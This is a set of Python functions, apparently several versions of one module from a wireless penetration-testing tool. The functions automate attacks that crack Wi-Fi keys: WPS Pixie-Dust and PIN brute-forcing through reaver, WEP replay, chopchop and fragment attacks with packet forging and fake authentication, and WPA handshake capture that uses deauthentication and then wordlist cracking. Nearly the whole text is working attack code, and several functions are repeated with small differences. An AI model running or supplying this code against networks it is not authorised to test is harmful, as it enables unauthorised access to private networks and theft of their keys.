def run_pixiedust_attack(self): # Write reaver stdout to file. self.stdout_file = Configuration.temp('reaver.out') if os.path.exists(self.stdout_file): os.remove(self.stdout_file) command = [ 'reaver', '--interface', Configuration.interface, '--bssid', self.target.bssid, '--channel', self.target.channel, '--pixie-dust', '1', # pixie-dust attack #'--delay', '0', #'--no-nacks', '--session', '/dev/null', # Don't restart session '-vv' # (very) verbose ] stdout_write = open(self.stdout_file, 'a') reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) pin = None step = 'initializing' time_since_last_step = 0 with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wash=True, output_file_prefix='pixie') as airodump: Color.clear_line() Color.pattack("WPS", self.target, "Pixie Dust", "Waiting for target to appear...") while True: try: airodump_target = self.wait_for_target(airodump) except Exception as e: Color.pattack("WPS", self.target, "Pixie-Dust", "{R}failed: {O}%s{W}" % e) Color.pl("") return False stdout_write.flush() # Check output from reaver process stdout = self.get_stdout() stdout_last_line = stdout.split('\n')[-1] (pin, psk, ssid) = self.get_pin_psk_ssid(stdout) # Check if we cracked it, or if process stopped. if (pin and psk and ssid) or reaver.poll() != None: reaver.interrupt() # Check one-last-time for PIN/PSK/SSID, in case of race condition. stdout = self.get_stdout() (pin, psk, ssid) = AttackWPS.get_pin_psk_ssid(stdout) # Check if we cracked it. if pin and psk and ssid: # We cracked it. bssid = self.target.bssid Color.clear_line() Color.pattack( "WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}\n") self.crack_result = CrackResultWPS( bssid, ssid, pin, psk) self.crack_result.dump() return True else: # Failed to crack, reaver proces ended. Color.clear_line() Color.pattack("WPS", airodump_target, "Pixie-Dust", "{R}Failed: {O}WPS PIN not found{W}\n") return False if 'WPS pin not found' in stdout: Color.pl('{R}failed: {O}WPS pin not found{W}') break last_step = step # Status updates, depending on last line of stdout if 'Waiting for beacon from' in stdout_last_line: step = '({C}step 1/8{W}) waiting for beacon' elif 'Associated with' in stdout_last_line: step = '({C}step 2/8{W}) waiting to start session' elif 'Starting Cracking Session.' in stdout_last_line: step = '({C}step 3/8{W}) waiting to try pin' elif 'Trying pin' in stdout_last_line: step = '({C}step 4/8{W}) trying pin' elif 'Sending EAPOL START request' in stdout_last_line: step = '({C}step 5/8{W}) sending eapol start request' elif 'Sending identity response' in stdout_last_line: step = '({C}step 6/8{W}) sending identity response' elif 'Sending M2 message' in stdout_last_line: step = '({C}step 7/8{W}) sending m2 message (may take a while)' elif 'Detected AP rate limiting,' in stdout_last_line: if Configuration.wps_skip_rate_limit: Color.pl('{R}failed: {O}hit WPS rate-limit{W}') Color.pl( '{!} {O}use {R}--ignore-ratelimit{O} to ignore' + ' this kind of failure in the future{W}') break step = '({C}step -/8{W}) waiting for AP rate limit' if step != last_step: # Step changed, reset step timer time_since_last_step = 0 else: time_since_last_step += 1 if time_since_last_step > Configuration.wps_pixie_step_timeout: Color.pl('{R}failed: {O}step-timeout after %d seconds{W}' % Configuration.wps_pixie_step_timeout) break # TODO: Timeout check if reaver.running_time() > Configuration.wps_pixie_timeout: Color.pl('{R}failed: {O}timeout after %d seconds{W}' % Configuration.wps_pixie_timeout) break # Reaver Failure/Timeout check fail_count = stdout.count('WPS transaction failed') if fail_count > Configuration.wps_fail_threshold: Color.pl('{R}failed: {O}too many failures (%d){W}' % fail_count) break timeout_count = stdout.count('Receive timeout occurred') if timeout_count > Configuration.wps_timeout_threshold: Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count) break Color.clear_line() Color.pattack("WPS", airodump_target, "Pixie-Dust", step) time.sleep(1) continue # Attack failed, already printed reason why reaver.interrupt() stdout_write.close() return False
def run(self): ''' Initiates full WEP attack. Including airodump-ng starting, cracking, etc. Returns: True if attack is succesful, false otherwise ''' aircrack = None # Aircrack process, not started yet fakeauth_proc = None replay_file = None attacks_remaining = list(Configuration.wep_attacks) while len(attacks_remaining) > 0: attack_name = attacks_remaining.pop(0) # BIG try-catch to capture ctrl+c try: # Start Airodump process with Airodump( channel=self.target.channel, target_bssid=self.target.bssid, ivs_only=True, # Only capture IVs packets skip_wash=True, # Don't check for WPS-compatibility output_file_prefix='wep') as airodump: Color.clear_line() Color.p('\r{+} {O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) fakeauth_proc = None if self.fake_auth(): # We successfully authenticated! # Use our interface's MAC address for the attacks. client_mac = Interface.get_mac() # Keep us authenticated fakeauth_proc = Aireplay(self.target, "fakeauth") elif len(airodump_target.clients) == 0: # Failed to fakeauth, can't use our MAC. # And there are no associated clients. Use one and tell the user. Color.pl('{!} {O}there are no associated clients{W}') Color.pl( '{!} {R}WARNING: {O}many attacks will not succeed' + ' without fake-authentication or associated clients{W}' ) client_mac = None else: # Fakeauth failed, but we can re-use an existing client client_mac = airodump_target.clients[0].station # Convert to WEPAttackType. wep_attack_type = WEPAttackType(attack_name) # Start Aireplay process. aireplay = Aireplay(self.target, wep_attack_type, client_mac=client_mac) time_unchanged_ivs = time.time( ) # Timestamp when IVs last changed previous_ivs = 0 # Loop until attack completes. while True: airodump_target = self.wait_for_target(airodump) status = "%d/{C}%d{W} IVs" % ( airodump_target.ivs, Configuration.wep_crack_at_ivs) if fakeauth_proc: if fakeauth_proc and fakeauth_proc.status: status += ", {G}fakeauth{W}" else: status += ", {R}no-auth{W}" if aireplay.status is not None: status += ", %s" % aireplay.status Color.clear_entire_line() Color.pattack("WEP", airodump_target, "%s attack" % attack_name, status) #self.aircrack_check() # Check if we cracked it. if aircrack and aircrack.is_cracked(): (hex_key, ascii_key) = aircrack.get_key_hex_ascii() bssid = airodump_target.bssid if airodump_target.essid_known: essid = airodump_target.essid else: essid = None Color.pl( '\n{+} {C}%s{W} WEP attack {G}successful{W}\n' % attack_name) if aireplay: aireplay.stop() if fakeauth_proc: fakeauth_proc.stop() self.crack_result = CrackResultWEP( self.target.bssid, self.target.essid, hex_key, ascii_key) self.crack_result.dump() self.success = True return self.success if aircrack and aircrack.is_running(): # Aircrack is running in the background. Color.p("and {C}cracking{W}") # Check number of IVs, crack if necessary if airodump_target.ivs > Configuration.wep_crack_at_ivs: if not aircrack: # Aircrack hasn't started yet. Start it. ivs_file = airodump.find_files( endswith='.ivs')[0] aircrack = Aircrack(ivs_file) elif not aircrack.is_running(): # Aircrack stopped running. Color.pl( '\n{!} {O}aircrack stopped running!{W}') ivs_file = airodump.find_files( endswith='.ivs')[0] Color.pl( '{+} {C}aircrack{W} stopped, restarting...' ) self.fake_auth() aircrack = Aircrack(ivs_file) elif Configuration.wep_restart_aircrack > 0 and \ aircrack.pid.running_time() > Configuration.wep_restart_aircrack: # Restart aircrack after X seconds aircrack.stop() ivs_file = airodump.find_files( endswith='.ivs')[0] Color.pl( '\n{+} {C}aircrack{W} ran for more than' + ' {C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack) aircrack = Aircrack(ivs_file) if not aireplay.is_running(): # Some Aireplay attacks loop infinitely if attack_name == 'chopchop' or attack_name == 'fragment': # We expect these to stop once a .xor is created, or if the process failed. replay_file = None # Check for .xor file. xor_file = Aireplay.get_xor() if not xor_file: # If .xor is not there, the process failed. Color.pl( '\n{!} {O}%s attack{R} did not generate' % attack_name + ' a .xor file{W}') # XXX: For debugging Color.pl('{?} {O}Command: {R}%s{W}' % aireplay.cmd) Color.pl('{?} {O}Output:\n{R}%s{W}' % aireplay.get_output()) break # If .xor exists, run packetforge-ng to create .cap Color.pl( '\n{+} {C}%s attack{W}' % attack_name + ' generated a {C}.xor file{W}, {G}forging...{W}' ) replay_file = Aireplay.forge_packet( xor_file, airodump_target.bssid, client_mac) if replay_file: Color.pl('{+} {C}forged packet{W},' + ' {G}replaying...{W}') wep_attack_type = WEPAttackType( "forgedreplay") attack_name = "forgedreplay" aireplay = Aireplay( self.target, 'forgedreplay', client_mac=client_mac, replay_file=replay_file) continue else: # Failed to forge packet. drop out break else: Color.pl( '\n{!} {O}aireplay-ng exited unexpectedly{W}' ) Color.pl('{?} {O}Command: {R}%s{W}' % aireplay.cmd) Color.pl('{?} {O}Output:\n%s{W}' % aireplay.get_output()) break # Continue to other attacks # Check if IVs stopped flowing (same for > N seconds) if airodump_target.ivs > previous_ivs: time_unchanged_ivs = time.time() elif Configuration.wep_restart_stale_ivs > 0 and \ attack_name != 'chopchop' and \ attack_name != 'fragment': stale_seconds = time.time() - time_unchanged_ivs if stale_seconds > Configuration.wep_restart_stale_ivs: # No new IVs within threshold, restart aireplay aireplay.stop() Color.pl( '\n{!} restarting {C}aireplay{W} after' + ' {C}%d{W} seconds of no new IVs' % stale_seconds) aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac, \ replay_file=replay_file) time_unchanged_ivs = time.time() previous_ivs = airodump_target.ivs time.sleep(1) continue # End of big while loop # End of with-airodump except KeyboardInterrupt: if fakeauth_proc: fakeauth_proc.stop() if len(attacks_remaining) == 0: self.success = False return self.success if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target): self.success = False return self.success except Exception as e: Color.pl("\n{+} {R}Error: {O}%s{W}" % e) continue # End of big try-catch # End of for-each-attack-type loop self.success = False return self.success
def run_wps_pin_attack(self): # Write reaver stdout to file. self.stdout_file = Configuration.temp('reaver.out') if os.path.exists(self.stdout_file): os.remove(self.stdout_file) stdout_write = open(self.stdout_file, 'a') # Start reaver process command = [ 'reaver', '--interface', Configuration.interface, '--bssid', self.target.bssid, '--channel', self.target.channel, '--session', '/dev/null', # Don't restart session '-vv' # verbose ] reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) self.success = False pins = set() pin_current = 0 pin_total = 11000 failures = 0 state = 'initializing' with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, skip_wash=True, output_file_prefix='wps') as airodump: Color.clear_line() Color.pattack("WPS", self.target, "PIN Attack", "Waiting for target to appear...") while True: try: airodump_target = self.wait_for_target(airodump) except Exception as e: Color.pattack("WPS", self.target, "PIN Attack", "{R}failed: {O}%s{W}" % e) Color.pl("") return False time.sleep(1) percent = 100 * float(pin_current) / float(pin_total) Color.clear_line() status = '{G}%.2f%% done{W}, ' % percent status += '{G}%d{W}/{G}%d pins{W}, ' % (pin_current, pin_total) status += '{R}%d/%d failures{W}' % ( failures, Configuration.wps_fail_threshold) Color.pattack("WPS", airodump_target, "PIN Attack", status) if failures >= Configuration.wps_fail_threshold: Color.pattack("WPS", airodump_target, "PIN Attack", '{R}failed: {O}too many failures{W}') Color.pl("") break # Get output out = self.get_stdout() # Clear output file f = open(self.stdout_file, 'w') f.write('') f.close() # CHECK FOR CRACK (pin, psk, ssid) = AttackWPS.get_pin_psk_ssid(out) if pin and psk and ssid: # We cracked it. self.success = True Color.pl('\n{+} {G}successly cracked WPS PIN and PSK{W}\n') self.crack_result = CrackResultWPS(self.target.bssid, ssid, pin, psk) self.crack_result.dump() break # PIN PROGRESS # Reaver 1.5.* match = None for match in re.finditer( 'Pin count advanced: (\d+)\\. Max pin attempts: (\d+)', out): # Look at last entry for "Pin count advanced" to get latest pin count pass if match: # Reset failures on successful try failures = 0 groups = match.groups() pin_current = int(groups[0]) pin_total = int(groups[1]) # Reaver 1.3, 1.4 match = None for match in re.finditer('Trying pin (\d+)', out): if match: pin = int(match.groups()[0]) if pin not in pins: # Reset failures on successful try failures = 0 pins.add(pin) pin_current += 1 # Failures if 'WPS transaction failed' in out: failures += out.count('WPS transaction failed') elif 'Receive timeout occurred' in out: # Reaver 1.4 failures += out.count('Receive timeout occurred') # Status if 'Waiting for beacon from' in out: state = '{O}waiting for beacon{W}' if 'Starting Cracking Session' in out: state = '{C}cracking{W}' # Reaver 1.4 if 'Trying pin' in out and 'cracking' not in state: state = '{C}cracking{W}' if 'Detected AP rate limiting' in out: state = '{R}rate-limited{W}' if Configuration.wps_skip_rate_limit: Color.pl(state) Color.pl('{!} {R}hit rate limit, stopping{W}') Color.pl( '{!} {O}use {R}--ignore-ratelimit{O} to ignore' + ' this kind of failure in the future{W}') break if 'WARNING: Failed to associate with' in out: # TODO: Fail after X association failures (instead of just one) Color.pl( '\n{!} {R}failed to associate with target, {O}stopping{W}' ) break match = re.search('Estimated Remaining time: ([a-zA-Z0-9]+)', out) if match: eta = match.groups()[0] state = '{C}cracking, ETA: {G}%s{W}' % eta match = re.search( 'Max time remaining at this rate: ([a-zA-Z0-9:]+)..([0-9]+) pins left to try', out) if match: eta = match.groups()[0] state = '{C}cracking, ETA: {G}%s{W}' % eta pins_left = int(match.groups()[1]) # Divine pin_current & pin_total from this: pin_current = 11000 - pins_left # Check if process is still running if reaver.pid.poll() != None: Color.pl('{R}failed{W}') Color.pl('{!} {R}reaver{O} quit unexpectedly{W}') self.success = False break # Output the current state Color.p(state) ''' [+] Waiting for beacon from AA:BB:CC:DD:EE:FF [+] Associated with AA:BB:CC:DD:EE:FF (ESSID: <essid here>) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Pin count advanced: 46. Max pin attempts: 11000 [!] WPS transaction failed (code: 0x02), re-trying last pin [!] WPS transaction failed (code: 0x03), re-trying last pin [!] WARNING: Failed to associate with 00:24:7B:AB:5C:EE (ESSID: myqwest0445) [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!] WARNING: 25 successive start failures [!] WARNING: Failed to associate with B2:B2:DC:A1:35:94 (ESSID: CenturyLink2217) [+] 0.55% complete. Elapsed time: 0d0h2m21s. [+] Estimated Remaining time: 0d15h11m35s [+] Pin cracked in 7 seconds [+] WPS PIN: '12345678' [+] WPA PSK: 'abcdefgh' [+] AP SSID: 'Test Router' Reaver 1.4: [+] Max time remaining at this rate: 18:19:36 (10996 pins left to try) [!] WARNING: Receive timeout occurred ''' reaver.interrupt() return self.success
def run(self): ''' Initiates full WEP attack. Including airodump-ng starting, cracking, etc. Returns: True if attack is succesful, false otherwise ''' # First, start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, ivs_only=True, # Only capture IVs packets output_file_prefix='wep') as airodump: Color.clear_line() Color.p('\r{+} {O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) if self.fake_auth(): # We successfully authenticated! # Use our interface's MAC address for the attacks. client_mac = Interface.get_mac() elif len(airodump_target.clients) == 0: # There are no associated clients. Warn user. Color.pl('{!} {O}there are no associated clients{W}') Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' + ' without fake-authentication or associated clients{W}') client_mac = None else: client_mac = airodump_target.clients[0].station aircrack = None # Aircrack process, not started yet for attack_name in Configuration.wep_attacks: # Convert to WEPAttackType. wep_attack_type = WEPAttackType(attack_name) replay_file = None # Start Aireplay process. aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac, \ replay_file=replay_file) time_unchanged_ivs = time.time() # Timestamp when IVs last changed previous_ivs = 0 # Loop until attack completes. while True: airodump_target = self.wait_for_target(airodump) Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) ' % (attack_name, airodump_target.ivs)) # Check if we cracked it. if aircrack and aircrack.is_cracked(): (hex_key, ascii_key) = aircrack.get_key_hex_ascii() bssid = airodump_target.bssid if airodump_target.essid_known: essid = airodump_target.essid else: essid = None Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' % attack_name) if aireplay: aireplay.stop() self.crack_result = CrackResultWEP(bssid, \ essid, \ hex_key, \ ascii_key) self.crack_result.dump() self.success = True return self.success if aircrack and aircrack.is_running(): # Aircrack is running in the background. Color.p('and {C}cracking{W}') # Check number of IVs, crack if necessary if airodump_target.ivs > Configuration.wep_crack_at_ivs: if not aircrack: # Aircrack hasn't started yet. Start it. ivs_file = airodump.find_files(endswith='.ivs')[0] aircrack = Aircrack(ivs_file) elif not aircrack.is_running(): # Aircrack stopped running. Color.pl('\n{!} {O}aircrack stopped running!{W}') ivs_file = airodump.find_files(endswith='.ivs')[0] Color.pl('{+} {C}aircrack{W} stopped,' + ' restarting {C}aircrack{W}') aircrack = Aircrack(ivs_file) elif aircrack.is_running() and \ Configuration.wep_restart_aircrack > 0: # Restart aircrack after X seconds if aircrack.pid.running_time() > Configuration.wep_restart_aircrack: aircrack.stop() ivs_file = airodump.find_files(endswith='.ivs')[0] Color.pl('\n{+} {C}aircrack{W} ran for more than' + ' {C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack) aircrack = Aircrack(ivs_file) if not aireplay.is_running(): # Some Aireplay attacks loop infinitely if attack_name == 'chopchop' or attack_name == 'fragment': # We expect these to stop once a .xor is created, # or if the process failed. replay_file = None # Check for .xor file. xor_file = Aireplay.get_xor() if not xor_file: # If .xor is not there, the process failed. Color.pl('\n{!} {O}%s attack{R} did not generate' + ' a .xor file{W}' % attack_name) # XXX: For debugging Color.pl('\noutput:\n') Color.pl(aireplay.get_output()) Color.pl('') break # If .xor exists, run packetforge-ng to create .cap Color.pl('\n{+} {C}%s attack{W}' % attack_name + ' generated a {C}.xor file{W}, {G}forging...{W}') forge_file = Aireplay.forge_packet(xor_file, airodump_target.bssid, client_mac) if forge_file: replay_file = forge_file Color.pl('{+} {C}forged packet{W},' + ' {G}replaying...{W}') attack_name = 'forged arp replay' aireplay = Aireplay(self.target, \ 'forgedreplay', \ client_mac=client_mac, \ replay_file=replay_file) continue else: # Failed to forge packet. drop out break else: Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}') Color.pl('\naireplay.get_output():') Color.pl(aireplay.get_output()) break # Continue to other attacks # Check if IVs stopped flowing (same for > N seconds) if airodump_target.ivs > previous_ivs: time_unchanged_ivs = time.time() elif Configuration.wep_restart_stale_ivs > 0 and \ attack_name != 'chopchop' and \ attack_name != 'fragment': stale_seconds = time.time() - time_unchanged_ivs if stale_seconds > Configuration.wep_restart_stale_ivs: # No new IVs within threshold, restart aireplay aireplay.stop() Color.pl('\n{!} restarting {C}aireplay{W} after' + ' {C}%d{W} seconds of no new IVs' % stale_seconds) aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac) time_unchanged_ivs = time.time() previous_ivs = airodump_target.ivs time.sleep(1) continue # End of big while loop # End of for-each-attack-type loop # End of with-airodump self.success = False return self.success
def run(self): ''' Initiates full WEP attack. Including airodump-ng starting, cracking, etc. Returns: True if attack is succesful, false otherwise ''' aircrack = None # Aircrack process, not started yet for (attack_index, attack_name) in enumerate(Configuration.wep_attacks): # BIG try-catch to capture ctrl+c try: # Start Airodump process with Airodump(channel=self.target.channel, target_bssid=self.target.bssid, ivs_only=True, # Only capture IVs packets skip_wash=True, # Don't check for WPS-compatibility output_file_prefix='wep') as airodump: Color.clear_line() Color.p('\r{+} {O}waiting{W} for target to appear...') airodump_target = self.wait_for_target(airodump) if self.fake_auth(): # We successfully authenticated! # Use our interface's MAC address for the attacks. client_mac = Interface.get_mac() elif len(airodump_target.clients) == 0: # There are no associated clients. Warn user. Color.pl('{!} {O}there are no associated clients{W}') Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' + ' without fake-authentication or associated clients{W}') client_mac = None else: client_mac = airodump_target.clients[0].station # Convert to WEPAttackType. wep_attack_type = WEPAttackType(attack_name) replay_file = None # Start Aireplay process. aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac, \ replay_file=replay_file) time_unchanged_ivs = time.time() # Timestamp when IVs last changed previous_ivs = 0 # Loop until attack completes. while True: airodump_target = self.wait_for_target(airodump) Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) ' % (attack_name, airodump_target.ivs)) # Check if we cracked it. if aircrack and aircrack.is_cracked(): (hex_key, ascii_key) = aircrack.get_key_hex_ascii() bssid = airodump_target.bssid if airodump_target.essid_known: essid = airodump_target.essid else: essid = None Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n' % attack_name) if aireplay: aireplay.stop() self.crack_result = CrackResultWEP(bssid, \ essid, \ hex_key, \ ascii_key) self.crack_result.dump() self.success = True return self.success if aircrack and aircrack.is_running(): # Aircrack is running in the background. Color.p('and {C}cracking{W}') # Check number of IVs, crack if necessary if airodump_target.ivs > Configuration.wep_crack_at_ivs: if not aircrack: # Aircrack hasn't started yet. Start it. ivs_file = airodump.find_files(endswith='.ivs')[0] aircrack = Aircrack(ivs_file) elif not aircrack.is_running(): # Aircrack stopped running. Color.pl('\n{!} {O}aircrack stopped running!{W}') ivs_file = airodump.find_files(endswith='.ivs')[0] Color.pl('{+} {C}aircrack{W} stopped,' + ' restarting {C}aircrack{W}') aircrack = Aircrack(ivs_file) elif aircrack.is_running() and \ Configuration.wep_restart_aircrack > 0: # Restart aircrack after X seconds if aircrack.pid.running_time() > Configuration.wep_restart_aircrack: aircrack.stop() ivs_file = airodump.find_files(endswith='.ivs')[0] Color.pl('\n{+} {C}aircrack{W} ran for more than' + ' {C}%d{W} seconds, restarting' % Configuration.wep_restart_aircrack) aircrack = Aircrack(ivs_file) if not aireplay.is_running(): # Some Aireplay attacks loop infinitely if attack_name == 'chopchop' or attack_name == 'fragment': # We expect these to stop once a .xor is created, # or if the process failed. replay_file = None # Check for .xor file. xor_file = Aireplay.get_xor() if not xor_file: # If .xor is not there, the process failed. Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name + ' a .xor file{W}') # XXX: For debugging Color.pl('\noutput:\n') Color.pl(aireplay.get_output()) Color.pl('') break # If .xor exists, run packetforge-ng to create .cap Color.pl('\n{+} {C}%s attack{W}' % attack_name + ' generated a {C}.xor file{W}, {G}forging...{W}') forge_file = Aireplay.forge_packet(xor_file, airodump_target.bssid, client_mac) if forge_file: replay_file = forge_file Color.pl('{+} {C}forged packet{W},' + ' {G}replaying...{W}') attack_name = 'forged arp replay' aireplay = Aireplay(self.target, \ 'forgedreplay', \ client_mac=client_mac, \ replay_file=replay_file) continue else: # Failed to forge packet. drop out break else: Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}') Color.pl('\naireplay.get_output():') Color.pl(aireplay.get_output()) break # Continue to other attacks # Check if IVs stopped flowing (same for > N seconds) if airodump_target.ivs > previous_ivs: time_unchanged_ivs = time.time() elif Configuration.wep_restart_stale_ivs > 0 and \ attack_name != 'chopchop' and \ attack_name != 'fragment': stale_seconds = time.time() - time_unchanged_ivs if stale_seconds > Configuration.wep_restart_stale_ivs: # No new IVs within threshold, restart aireplay aireplay.stop() Color.pl('\n{!} restarting {C}aireplay{W} after' + ' {C}%d{W} seconds of no new IVs' % stale_seconds) aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac) time_unchanged_ivs = time.time() previous_ivs = airodump_target.ivs time.sleep(1) continue # End of big while loop # End of with-airodump except KeyboardInterrupt: if not self.user_wants_to_continue(attack_index): self.success = False return self.success # End of big try-catch # End of for-each-attack-type loop self.success = False return self.success
def run(self): """ Initiates full WPA hanshake capture attack. """ # Check if user only wants to run PixieDust attack if Configuration.pixie_only and self.target.wps: Color.pl("{!} {O}--pixie{R} set, ignoring WPA-handshake attack") self.success = False return self.success # First, start Airodump process with Airodump( channel=self.target.channel, target_bssid=self.target.bssid, skip_wash=True, output_file_prefix="wpa" ) as airodump: Color.clear_line() Color.p("\r{+} {C}WPA-handshake attack{W}: ") Color.p("{O}waiting{W} for target to appear...") airodump_target = self.wait_for_target(airodump) # Get client station MAC addresses clients = [c.station for c in airodump_target.clients] client_index = 0 handshake = None time_since_deauth = time.time() deauth_proc = None while True: if not deauth_proc or deauth_proc.poll() != None: # Clear line only if we're not deauthing right now Color.p("\r%s\r" % (" " * 90)) Color.p("\r{+} {C}WPA-handshake attack{W}: ") Color.p("waiting for {C}handshake{W}...") time.sleep(1) # Find .cap file cap_files = airodump.find_files(endswith=".cap") if len(cap_files) == 0: # No cap files yet continue cap_file = cap_files[0] # Copy .cap file to temp for consistency temp_file = Configuration.temp("handshake.cap.bak") copy(cap_file, temp_file) # Check cap file in temp for Handshake bssid = airodump_target.bssid essid = None if airodump_target.essid_known: essid = airodump_target.essid handshake = Handshake(temp_file, bssid=bssid, essid=essid) if handshake.has_handshake(): # We got a handshake Color.pl("\n\n{+} {G}successfully captured handshake{W}") break # There is no handshake handshake = None # Delete copied .cap file in temp to save space os.remove(temp_file) # Check status of deauth process if deauth_proc and deauth_proc.poll() == None: # Deauth process is still running time_since_deauth = time.time() # Look for new clients airodump_target = self.wait_for_target(airodump) for client in airodump_target.clients: if client.station not in clients: Color.pl("\r{+} discovered {G}client{W}:" + " {C}%s{W}%s" % (client.station, " " * 10)) clients.append(client.station) # Send deauth to a client or broadcast if time.time() - time_since_deauth > Configuration.wpa_deauth_timeout: # We are N seconds since last deauth was sent, # And the deauth process is not running. if len(clients) == 0 or client_index >= len(clients): deauth_proc = self.deauth(bssid) client_index = 0 else: client = clients[client_index] deauth_proc = self.deauth(bssid, client) client_index += 1 time_since_deauth = time.time() continue # Stop the deauth process if needed if deauth_proc and deauth_proc.poll() == None: deauth_proc.interrupt() if not handshake: # No handshake, attack failed. self.success = False return self.success key = None # Save copy of handshake to ./hs/ self.save_handshake(handshake) # Print analysis of handshake file Color.pl("\n{+} analysis of captured handshake file:") handshake.analyze() # Crack handshake wordlist = Configuration.wordlist if wordlist != None: wordlist_name = wordlist.split(os.sep)[-1] if not os.path.exists(wordlist): Color.pl("{!} {R}unable to crack:" + " wordlist {O}%s{R} does not exist{W}" % wordlist) else: # We have a wordlist we can use Color.p( "\n{+} {C}cracking handshake{W}" + " using {C}aircrack-ng{W}" + " with {C}%s{W} wordlist" % wordlist_name ) # TODO: More-verbose cracking status # 1. Read number of lines in 'wordlist' # 2. Pipe aircrack stdout to file # 3. Read from file every second, get keys tried so far # 4. Display # of keys tried / total keys, and ETA key_file = Configuration.temp("wpakey.txt") command = ["aircrack-ng", "-a", "2", "-w", wordlist, "-l", key_file, handshake.capfile] aircrack = Process(command, devnull=True) aircrack.wait() if os.path.exists(key_file): # We cracked it. Color.pl("\n\n{+} {G}successfully cracked PSK{W}\n") f = open(key_file, "r") key = f.read() f.close() else: Color.pl( "\n{!} {R}handshake crack failed:" + " {O}%s did not contain password{W}" % wordlist.split(os.sep)[-1] ) self.crack_result = CrackResultWPA(bssid, essid, handshake.capfile, key) self.crack_result.dump() self.success = True return self.success
def run_pixiedust_attack(self): # Write reaver stdout to file. self.stdout_file = Configuration.temp('reaver.out') if os.path.exists(self.stdout_file): os.remove(self.stdout_file) command = [ 'reaver', '-i', Configuration.interface, '-b', self.target.bssid, '-c', self.target.channel, '-K', '1', # pixie-dust attack '-a', # Automatically restart session '-vv' # (very) verbose ] stdout_write = open(self.stdout_file, 'a') reaver = Process(command, stdout=stdout_write, stderr=Process.devnull()) pin = None step = '0) initializing' time_since_last_step = 0 while True: time.sleep(1) Color.clear_line() Color.p('\r{+} {C}WPS pixie-dust attack{W} ') stdout_write.flush() # Check output from reaver process stdout = self.get_stdout() stdout_last_line = stdout.split('\n')[-1] (pin, psk, ssid) = self.get_pin_psk_ssid(stdout) # Check if we cracked it, or if process stopped. if (pin and psk and ssid) or reaver.poll() != None: reaver.interrupt() # Check one-last-time for PIN/PSK/SSID, in case of race condition. stdout = self.get_stdout() (pin, psk, ssid) = AttackWPS.get_pin_psk_ssid(stdout) # Check if we cracked it. if pin and psk and ssid: # We cracked it. bssid = self.target.bssid Color.pl('\n\n{+} {G}successfully cracked WPS PIN and PSK{W}\n') self.crack_result = CrackResultWPS(bssid, ssid, pin, psk) self.crack_result.dump() return True else: # Failed to crack, reaver proces ended. Color.pl('{R}failed: {O}WPS pin not found{W}') return False last_step = step # Status updates, depending on last line of stdout if 'Waiting for beacon from' in stdout_last_line: step = '({C}step 1/8{W}) waiting for beacon' elif 'Associated with' in stdout_last_line: step = '({C}step 2/8{W}) waiting to start session' elif 'Starting Cracking Session.' in stdout_last_line: step = '({C}step 3/8{W}) waiting to try pin' elif 'Trying pin' in stdout_last_line: step = '({C}step 4/8{W}) trying pin' elif 'Sending EAPOL START request' in stdout_last_line: step = '({C}step 5/8{W}) sending eapol start request' elif 'Sending identity response' in stdout_last_line: step = '({C}step 6/8{W}) sending identity response' elif 'Sending M2 message' in stdout_last_line: step = '({C}step 7/8{W}) sending m2 message (may take a while)' elif 'Detected AP rate limiting,' in stdout_last_line: if Configuration.wps_skip_rate_limit: Color.pl('{R}failed: {O}hit WPS rate-limit{W}') Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' + ' this kind of failure in the future{W}') break step = '({C}step -/8{W}) waiting for AP rate limit' if 'WPS pin not found' in stdout: Color.pl('{R}failed: {O}WPS pin not found{W}') break if step != last_step: # Step changed, reset step timer time_since_last_step = 0 else: time_since_last_step += 1 if time_since_last_step > Configuration.wps_pixie_step_timeout: Color.pl('{R}failed: {O}step-timeout after %d seconds{W}' % Configuration.wps_pixie_step_timeout) break # TODO: Timeout check if reaver.running_time() > Configuration.wps_pixie_timeout: Color.pl('{R}failed: {O}timeout after %d seconds{W}' % Configuration.wps_pixie_timeout) break # Reaver Failure/Timeout check fail_count = stdout.count('WPS transaction failed') if fail_count > Configuration.wps_fail_threshold: Color.pl('{R}failed: {O}too many failures (%d){W}' % fail_count) break timeout_count = stdout.count('Receive timeout occurred') if timeout_count > Configuration.wps_timeout_threshold: Color.pl('{R}failed: {O}too many timeouts (%d){W}' % timeout_count) break # Display status of Pixie-Dust attack Color.p('{W}%s{W}' % step) continue # Attack failed, already printed reason why reaver.interrupt() stdout_write.close() return False
